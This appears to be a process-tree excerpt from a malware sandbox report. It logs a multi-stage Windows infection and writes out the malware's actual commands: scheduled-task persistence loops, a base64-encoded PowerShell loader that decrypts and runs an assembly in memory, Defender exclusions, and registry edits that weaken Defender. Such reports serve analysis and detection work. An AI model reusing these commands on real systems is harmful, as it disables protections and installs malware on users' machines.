[3] C:\Users\Admin\AppData\Local\Temp\vir_0ac24ce5-6788-461d-8ff7-25fab73bfec7\scary.exe  |  scary.exe  |  PID 6724
    - Executes dropped EXE
    - Drops file in Program Files directory
    - Suspicious use of AdjustPrivilegeToken
  [4] C:\Windows\SYSTEM32\schtasks.exe  |  "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f  |  PID 6940
      - Scheduled Task/Job: Scheduled Task
  [4] C:\Program Files\SubDir\Romilyaa.exe  |  "C:\Program Files\SubDir\Romilyaa.exe"  |  PID 7000
      - Checks computer location settings
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SendNotifyMessage
    [5] C:\Windows\SYSTEM32\schtasks.exe  |  (same /create command line as PID 6940)  |  PID 7036
        - Scheduled Task/Job: Scheduled Task
    [5] C:\Windows\system32\cmd.exe  |  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pc8glp8LK1ff.bat" "  |  PID 7136
      [6] C:\Windows\system32\chcp.com  |  chcp 65001  |  PID 1928
      [6] C:\Windows\system32\PING.EXE  |  ping -n 10 localhost  |  PID 6212
          - System Network Configuration Discovery: Internet Connection Discovery
          - Runs ping.exe
      [6] C:\Program Files\SubDir\Romilyaa.exe  |  "C:\Program Files\SubDir\Romilyaa.exe"  |  PID 6508
          - Checks computer location settings
          - Executes dropped EXE
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of FindShellTrayWindow
          - Suspicious use of SendNotifyMessage
        [7] C:\Windows\SYSTEM32\schtasks.exe  |  (same /create command line as PID 6940)  |  PID 6560
            - Scheduled Task/Job: Scheduled Task
        [7] C:\Windows\system32\cmd.exe  |  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Kf2fIpEww7x1.bat" "  |  PID 2408
          [8] C:\Windows\system32\chcp.com  |  chcp 65001  |  PID 6700
          [8] C:\Windows\system32\PING.EXE  |  ping -n 10 localhost  |  PID 1772
              - System Network Configuration Discovery: Internet Connection Discovery
              - Runs ping.exe
          [8] C:\Program Files\SubDir\Romilyaa.exe  |  "C:\Program Files\SubDir\Romilyaa.exe"  |  PID 7832
              - Checks computer location settings
              - Executes dropped EXE
              - Suspicious use of AdjustPrivilegeToken
            [9] C:\Windows\SYSTEM32\schtasks.exe  |  (same /create command line as PID 6940)  |  PID 7460
                - Scheduled Task/Job: Scheduled Task
            [9] C:\Windows\system32\cmd.exe  |  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\k79M5yqeHZXk.bat" "  |  PID 5380
              [10] C:\Windows\system32\chcp.com  |  chcp 65001  |  PID 436
              [10] C:\Windows\system32\PING.EXE  |  ping -n 10 localhost  |  PID 4776
                  - System Network Configuration Discovery: Internet Connection Discovery
                  - Runs ping.exe
              [10] C:\Program Files\SubDir\Romilyaa.exe  |  "C:\Program Files\SubDir\Romilyaa.exe"  |  PID 6628
                  - Checks computer location settings
                  - Executes dropped EXE
                  - Suspicious use of AdjustPrivilegeToken
                [11] C:\Windows\SYSTEM32\schtasks.exe  |  (same /create command line as PID 6940)  |  PID 7184
                    - Scheduled Task/Job: Scheduled Task
                [11] C:\Windows\system32\cmd.exe  |  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SIhrb24qQZrN.bat" "  |  PID 7604
                  [12] C:\Windows\system32\chcp.com  |  chcp 65001  |  PID 8068
                  [12] C:\Windows\system32\PING.EXE  |  ping -n 10 localhost  |  PID 8092
                      - System Network Configuration Discovery: Internet Connection Discovery
                      - Runs ping.exe
                  [12] C:\Program Files\SubDir\Romilyaa.exe  |  "C:\Program Files\SubDir\Romilyaa.exe"  |  PID 3512
                      - Checks computer location settings
                      - Executes dropped EXE
                    [13] C:\Windows\SYSTEM32\schtasks.exe  |  (same /create command line as PID 6940)  |  PID 4016
                        - Scheduled Task/Job: Scheduled Task
                    [13] C:\Windows\system32\cmd.exe  |  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gtS3RpuDGRYF.bat" "  |  PID 4356
                      [14] C:\Windows\system32\chcp.com  |  chcp 65001  |  PID 5476
                      [14] C:\Windows\system32\PING.EXE  |  ping -n 10 localhost  |  PID 456
                          - System Network Configuration Discovery: Internet Connection Discovery
                          - Runs ping.exe
                      [14] C:\Program Files\SubDir\Romilyaa.exe  |  "C:\Program Files\SubDir\Romilyaa.exe"  |  PID 3544
                        [15] C:\Windows\SYSTEM32\schtasks.exe  |  (same /create command line as PID 6940)  |  PID 8388
                            - Scheduled Task/Job: Scheduled Task
                        [15] C:\Windows\system32\cmd.exe  |  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DcdUkOTUsIHj.bat" "  |  PID 9024
                          [16] C:\Windows\system32\chcp.com  |  chcp 65001  |  PID 9096
                          [16] C:\Windows\system32\PING.EXE  |  ping -n 10 localhost  |  PID 8832
                              - System Network Configuration Discovery: Internet Connection Discovery
                              - Runs ping.exe
                          [16] C:\Program Files\SubDir\Romilyaa.exe  |  "C:\Program Files\SubDir\Romilyaa.exe"  |  PID 436
                            [17] C:\Windows\SYSTEM32\schtasks.exe  |  (same /create command line as PID 6940)  |  PID 8752
                                - Scheduled Task/Job: Scheduled Task
                            [17] C:\Windows\system32\cmd.exe  |  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YBQGH7HDzPYy.bat" "  |  PID 8536
                              [18] C:\Windows\system32\chcp.com  |  chcp 65001  |  PID 8352
                              [18] C:\Windows\system32\PING.EXE  |  ping -n 10 localhost  |  PID 8380
                                  - System Network Configuration Discovery: Internet Connection Discovery
                                  - Runs ping.exe
                              [18] C:\Program Files\SubDir\Romilyaa.exe  |  "C:\Program Files\SubDir\Romilyaa.exe"  |  PID 636
                                [19] C:\Windows\SYSTEM32\schtasks.exe  |  (same /create command line as PID 6940)  |  PID 5876
                                    - Scheduled Task/Job: Scheduled Task
                                [19] C:\Windows\system32\cmd.exe  |  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eqTkb2uNApMf.bat" "  |  PID 8984
                                  [20] C:\Windows\system32\chcp.com  |  chcp 65001  |  PID 6936
                                  [20] C:\Windows\system32\PING.EXE  |  ping -n 10 localhost  |  PID 1708
                                      - System Network Configuration Discovery: Internet Connection Discovery
                                      - Runs ping.exe
                                  [20] C:\Program Files\SubDir\Romilyaa.exe  |  "C:\Program Files\SubDir\Romilyaa.exe"  |  PID 2492
                                    [21] C:\Windows\SYSTEM32\schtasks.exe  |  (same /create command line as PID 6940)  |  PID 6480
                                        - Scheduled Task/Job: Scheduled Task
                                    [21] C:\Windows\system32\cmd.exe  |  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zCHOq8muK4M2.bat" "  |  PID 8888
                                      [22] C:\Windows\system32\chcp.com  |  chcp 65001  |  PID 9024
                                      [22] C:\Windows\system32\PING.EXE  |  ping -n 10 localhost  |  PID 9032
                                          - System Network Configuration Discovery: Internet Connection Discovery
                                          - Runs ping.exe
                                      [22] C:\Program Files\SubDir\Romilyaa.exe  |  "C:\Program Files\SubDir\Romilyaa.exe"  |  PID 4544
                                        [23] C:\Windows\SYSTEM32\schtasks.exe  |  (same /create command line as PID 6940)  |  PID 6292
                                            - Scheduled Task/Job: Scheduled Task
                                        [23] C:\Windows\system32\cmd.exe  |  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OnVT4nRnqpI9.bat" "  |  PID 8608
                                          [24] C:\Windows\system32\chcp.com  |  chcp 65001  |  PID 3948
                                          [24] C:\Windows\system32\PING.EXE  |  ping -n 10 localhost  |  PID 7024
                                              - System Network Configuration Discovery: Internet Connection Discovery
                                              - Runs ping.exe
                                          [24] C:\Program Files\SubDir\Romilyaa.exe  |  "C:\Program Files\SubDir\Romilyaa.exe"  |  PID 8736
                                            [25] C:\Windows\SYSTEM32\schtasks.exe  |  (same /create command line as PID 6940)  |  PID 5644
                                                - Scheduled Task/Job: Scheduled Task
                                            [25] C:\Windows\system32\cmd.exe  |  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LLiRiWqd1keR.bat" "  |  PID 8368
                                              [26] C:\Windows\system32\chcp.com  |  chcp 65001  |  PID 1772
                                              [26] C:\Windows\system32\PING.EXE  |  ping -n 10 localhost  |  PID 5144
                                                  - System Network Configuration Discovery: Internet Connection Discovery
                                                  - Runs ping.exe
                                              [26] C:\Program Files\SubDir\Romilyaa.exe  |  "C:\Program Files\SubDir\Romilyaa.exe"  |  PID 9192
                                                [27] C:\Windows\SYSTEM32\schtasks.exe  |  (same /create command line as PID 6940)  |  PID 4072
                                                    - Scheduled Task/Job: Scheduled Task
                                                [27] C:\Windows\system32\cmd.exe  |  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HJP9IhqcWbcw.bat" "  |  PID 8864
                                                  [28] C:\Windows\system32\chcp.com  |  chcp 65001  |  PID 8440
                                                  [28] C:\Windows\system32\PING.EXE  |  ping -n 10 localhost  |  PID 3760
                                                      - System Network Configuration Discovery: Internet Connection Discovery
                                                      - Runs ping.exe
                                                  [28] C:\Program Files\SubDir\Romilyaa.exe  |  "C:\Program Files\SubDir\Romilyaa.exe"  |  PID 4556
                                                    [29] C:\Windows\SYSTEM32\schtasks.exe  |  (same /create command line as PID 6940)  |  PID 4124
                                                        - Scheduled Task/Job: Scheduled Task
                                                    [29] C:\Windows\system32\cmd.exe  |  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6sn6DjLrG5Bc.bat" "  |  PID 8344
                                                      [30] C:\Windows\system32\chcp.com  |  chcp 65001  |  PID 8984
[3] C:\Users\Admin\AppData\Local\Temp\vir_0ac24ce5-6788-461d-8ff7-25fab73bfec7\the.exe  |  the.exe  |  PID 6732
    - Executes dropped EXE
  [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  |  powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgAMQAwADAAMAAwACkACgAKACQARQYkBkIGKgYgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJABGBkUGSAYwBiwGIAA9ACAAJwBmAGkAbABlAC0AKgAuAHAAdQB0AGkAawAnAAoAJABFBkQGQQZfACMGLgZKBjEGIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQARQYkBkIGKgYgAC0ARgBpAGwAdABlAHIAIAAkAEYGRQZIBjAGLAYgAHwAIABTAG8AcgB0AC0ATwBiAGoAZQBjAHQAIABMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADEACgAKAGYAdQBuAGMAdABpAG8AbgAgAEEGQwZfACcGRAYqBjQGQQZKBjEGIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGQQYqBicGLQYsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiwACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAKAZKBicGRgYnBioGCgAgACAAIAAgACkACgAKACAAIAAgACAAJABFBjQGQQYxBiAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJABFBjQGQQYxBi4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkAEUGNAZBBjEGLgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYgAD0AIAAkAEUGNAZBBjEGLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQARQZBBioGJwYtBiwAIAAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBikACgAgACAAIAAgACQAKAZKBicGRgYnBioGXwBFBkEGQwZIBkMGKQZfACcGRAYqBjQGQQZKBjEGIAA9ACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkACgGSgYnBkYGJwYqBiwAIAAwACwAIAAkACgGSgYnBkYGJwYqBi4ATABlAG4AZwB0AGgAKQAKAAkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJAAoBkoGJwZGBicGKgZfAEUGQQZDBkgGQwYpBl8AJwZEBioGNAZBBkoGMQYKAH0ACgAKACQARQZBBioGJwYtBiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEQAOAAsACAAMAB4ADIARgAsACAAMAB4ADEARgAsACAAMAB4ADYAQwAsACAAMAB4ADQARQAsACAAMAB4ADgAOAAsACAAMAB4ADQANQAsACAAMAB4AEQARAAsACAAMAB4ADEAQQAsACAAMAB4AEUARAAsACAAMAB4ADUAQwAsACAAMAB4ADQAQgAsACAAMAB4ADQAOQAsACAAMAB4ADQAOQAsACAAMAB4ADAAQwAsACAAMAB4ADMAQgAsACAAMAB4AEYAQQAsACAAMAB4AEEAMQAsACAAMAB4ADIANwAsACAAMAB4ADMARAAsACAAMAB4ADIAQQAsACAAMAB4AEIANQAsACAAMAB4AEMARAAsACAAMAB4ADIANwAsACAAMAB4ADQARAAsACAAMAB4ADAAQQAsACAAMAB4ADUAOQAsACAAMAB4ADUANwAsACAAMAB4AEMAQQAsACAAMAB4ADcAMAAsACAAMAB4AEEAQQAsACAAMAB4AEMAQgApAAoAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAAxAEMALAAgADAAeABBADMALAAgADAAeAAzADQALAAgADAAeABBADYALAAgADAAeAA4ADQALAAgADAAeABDAEMALAAgADAAeABBAEEALAAgADAAeABEADIALAAgADAAeABCADAALAAgADAAeABFAEUALAAgADAAeABBAEMALAAgADAAeABEADcALAAgADAAeABFAEIALAAgADAAeABGAEUALAAgADAAeAA4AEYALAAgADAAeAA5ADkAKQAKAAoAaQBmACAAKAAkAEUGRAZBBl8AIwYuBkoGMQYgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGIAA9ACAAJABFBkQGQQZfACMGLgZKBjEGLgBGAHUAbABsAE4AYQBtAGUACgAgACAAIAAgACQAKAYnBkoGKgYnBioGXwBFBjQGQQYxBikGIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGKQA7AAoAIAAgACAAIAAkAEUGLQYqBkgGSQZfAEUGQQZDBkgGQwZfACcGRAYqBjQGQQZKBjEGIAA9ACAAQQZDBl8AJwZEBioGNAZBBkoGMQYgAC0ARQZBBioGJwYtBiAAJABFBkEGKgYnBi0GIAAtAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiAAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAC0AKAZKBicGRgYnBioGIAAkACgGJwZKBioGJwYqBl8ARQY0BkEGMQYpBgoACgAgACAAIAAgACQAKgYsBkUGSgY5BiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQARQYtBioGSAZJBl8ARQZBBkMGSAZDBl8AJwZEBioGNAZBBkoGMQYpACkAOwAKACAAIAAgACAAJABGBkIGNwYpBl8AJwZEBi8GLgZIBkQGIAA9ACAAJAAqBiwGRQZKBjkGLgBFAG4AdAByAHkAUABvAGkAbgB0ADsACgAgACAAIAAgACQARgZCBjcGKQZfACcGRAYvBi4GSAZEBi4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA  |  PID 436
      - UAC bypass
      - Windows security bypass
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    [5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  |  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\vir_0ac24ce5-6788-461d-8ff7-25fab73bfec7\the.exe" -Force  |  PID 7468
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
    [5] C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe  |  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"  |  PID 7512
        - Drops startup file
        - System Location Discovery: System Language Discovery
        - Suspicious use of AdjustPrivilegeToken
      [6] C:\Users\Admin\Pictures\lx26s09UlZjAOugX3CvKdnQ3.exe  |  "C:\Users\Admin\Pictures\lx26s09UlZjAOugX3CvKdnQ3.exe"  |  PID 7736
          - Executes dropped EXE
          - System Location Discovery: System Language Discovery
          - Suspicious behavior: EnumeratesProcesses
      [6] C:\Users\Admin\Pictures\SWjzRG7RCalw924ufm5qL0sx.exe  |  "C:\Users\Admin\Pictures\SWjzRG7RCalw924ufm5qL0sx.exe"  |  PID 1592
          - Executes dropped EXE
          - System Location Discovery: System Language Discovery
          - Checks SCSI registry key(s)
        [7] C:\Windows\SysWOW64\WerFault.exe  |  C:\Windows\SysWOW64\WerFault.exe -u -p 1592 -s 356  |  PID 7408
            - Program crash
      [6] C:\Users\Admin\Pictures\6eoK9cmGaTaMPDXJDZ5cDxGS.exe  |  "C:\Users\Admin\Pictures\6eoK9cmGaTaMPDXJDZ5cDxGS.exe"  |  PID 5776
          - Modifies firewall policy service
          - Windows security bypass
          - Checks computer location settings
          - Executes dropped EXE
          - Windows security modification
          - Drops file in System32 directory
          - Suspicious behavior: EnumeratesProcesses
        [7] C:\Users\Admin\Documents\piratemamm\Z8t0pFkWK3m0W0pQLRHCqeUL.exe  |  C:\Users\Admin\Documents\piratemamm\Z8t0pFkWK3m0W0pQLRHCqeUL.exe  |  PID 8592
        [7] C:\Users\Admin\Documents\piratemamm\aTJUAtpVMdPytuyR0HOsCgxw.exe  |  C:\Users\Admin\Documents\piratemamm\aTJUAtpVMdPytuyR0HOsCgxw.exe  |  PID 4356
          [8] C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe  |  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"  |  PID 4580
          [8] C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe  |  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"  |  PID 7044
        [7] C:\Users\Admin\Documents\piratemamm\sPQ2SE4hD4JNv4dSwj_Q1RB7.exe  |  C:\Users\Admin\Documents\piratemamm\sPQ2SE4hD4JNv4dSwj_Q1RB7.exe  |  PID 8544
          [8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  |  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\piratemamm\sPQ2SE4hD4JNv4dSwj_Q1RB7.exe" -Force  |  PID 4572
              - Command and Scripting Interpreter: PowerShell
          [8] C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe  |  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"  |  PID 8944
            [9] C:\Users\Admin\Pictures\AVnq8vZCzLldUHR6uTZF79zz.exe  |  "C:\Users\Admin\Pictures\AVnq8vZCzLldUHR6uTZF79zz.exe"  |  PID 8512
            [9] C:\Users\Admin\Pictures\XJJY0YDC8CW13ScDrJpziNaD.exe  |  "C:\Users\Admin\Pictures\XJJY0YDC8CW13ScDrJpziNaD.exe"  |  PID 6528
          [8] C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe  |  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"  |  PID 6160
        [7] C:\Users\Admin\Documents\piratemamm\6Zqf_ldBmq3rzJmo7C9SMvep.exe  |  C:\Users\Admin\Documents\piratemamm\6Zqf_ldBmq3rzJmo7C9SMvep.exe /S /did=525403  |  PID 7440
          [8] C:\Users\Admin\AppData\Local\Temp\7zSD10D.tmp\Install.exe  |  .\Install.exe /S /did=525403  |  PID 8484
            [9] C:\Users\Admin\AppData\Local\Temp\7zSE233.tmp\Install.exe  |  .\Install.exe /hnmdidSGLmk "525403" /S /S /did=525403  |  PID 4580
              [10] C:\Windows\SysWOW64\cmd.exe  |  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"  |  PID 6488
                [11] C:\Windows\SysWOW64\forfiles.exe  |  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"  |  PID 8276
                    - Indirect Command Execution
                  [12] C:\Windows\SysWOW64\cmd.exe  |  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6  |  PID 9088
                    [13] \??\c:\windows\SysWOW64\reg.exe  |  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6  |  PID 1724
                [11] C:\Windows\SysWOW64\forfiles.exe  |  forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"  |  PID 1724
                    - Indirect Command Execution
                  [12] C:\Windows\SysWOW64\cmd.exe  |  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6  |  PID 7284
                    [13] \??\c:\windows\SysWOW64\reg.exe  |  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6  |  PID 5408
              [10] C:\Windows\SysWOW64\forfiles.exe  |  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m help.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"  |  PID 5280
                  - Indirect Command Execution
                [11] C:\Windows\SysWOW64\cmd.exe  |  /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True  |  PID 7384
                  [12] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  |  powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True  |  PID 7052
                      - Command and Scripting Interpreter: PowerShell
                    [13] C:\Windows\SysWOW64\Wbem\WMIC.exe  |  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True  |  PID 6100
              [10] C:\Windows\SysWOW64\schtasks.exe  |  schtasks /CREATE /TN "bUrgtLorVQntIbrvYS" /SC once /ST 19:36:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSE233.tmp\Install.exe\" Xi /DZldidho 525403 /S" /V1 /F  |  PID 6768
                  - Scheduled Task/Job: Scheduled Task
        [7] C:\Users\Admin\Documents\piratemamm\_6Mbe7dpbVGcKvisAiF33Bfg.exe  |  C:\Users\Admin\Documents\piratemamm\_6Mbe7dpbVGcKvisAiF33Bfg.exe  |  PID 6708
          [8] C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe  |  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"  |  PID 7736
          [8] C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe  |  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"  |  PID 1436
        [7] C:\Users\Admin\Documents\piratemamm\wmC8_s0x6QGMWkUdOlIa8fbV.exe  |  C:\Users\Admin\Documents\piratemamm\wmC8_s0x6QGMWkUdOlIa8fbV.exe  |  PID 7540
        [7] C:\Users\Admin\Documents\piratemamm\dCK4hwsjPgIbAA4O7SJS7Ok0.exe  |  C:\Users\Admin\Documents\piratemamm\dCK4hwsjPgIbAA4O7SJS7Ok0.exe  |  PID 8256
          [8] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  |  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"  |  PID 8696
        [7] C:\Users\Admin\Documents\piratemamm\oZCpWkx39j9GnHQMOl8Kmxam.exe  |  C:\Users\Admin\Documents\piratemamm\oZCpWkx39j9GnHQMOl8Kmxam.exe  |  PID 8404
          [8] C:\Users\Admin\AppData\Local\Temp\is-18UQB.tmp\oZCpWkx39j9GnHQMOl8Kmxam.tmp  |  "C:\Users\Admin\AppData\Local\Temp\is-18UQB.tmp\oZCpWkx39j9GnHQMOl8Kmxam.tmp" /SL5="$2053E,4025586,54272,C:\Users\Admin\Documents\piratemamm\oZCpWkx39j9GnHQMOl8Kmxam.exe"  |  PID 2344
            [9] C:\Users\Admin\AppData\Local\SuffixEx\suffixex32_64.exe  |  "C:\Users\Admin\AppData\Local\SuffixEx\suffixex32_64.exe" -i  |  PID 6488
            [9] C:\Users\Admin\AppData\Local\SuffixEx\suffixex32_64.exe  |  "C:\Users\Admin\AppData\Local\SuffixEx\suffixex32_64.exe" -s  |  PID 5780
        [7] C:\Users\Admin\Documents\piratemamm\cA2dIpkwaaaEIaYm8k_ioETs.exe  |  C:\Users\Admin\Documents\piratemamm\cA2dIpkwaaaEIaYm8k_ioETs.exe  |  PID 9036
          [8] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  |  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"  |  PID 6504
        [7] C:\Users\Admin\Documents\piratemamm\Eh0ooWT0NCzz8_zB5pggpidA.exe  |  C:\Users\Admin\Documents\piratemamm\Eh0ooWT0NCzz8_zB5pggpidA.exe  |  PID 7484
          [8] C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe  |  "C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"  |  PID 7608
            [9] C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe  |  "C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"  |  PID 4448
            [9] C:\Users\Admin\AppData\Local\Temp\1000020001\2671d90175.exe  |  "C:\Users\Admin\AppData\Local\Temp\1000020001\2671d90175.exe"  |  PID 692
              [10] C:\Windows\system32\cmd.exe  |  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4EE.tmp\4EF.tmp\4F0.bat C:\Users\Admin\AppData\Local\Temp\1000020001\2671d90175.exe"  |  PID 2664
            [9] C:\Users\Admin\1000021002\2b6c130756.exe  |  "C:\Users\Admin\1000021002\2b6c130756.exe"  |  PID 7496
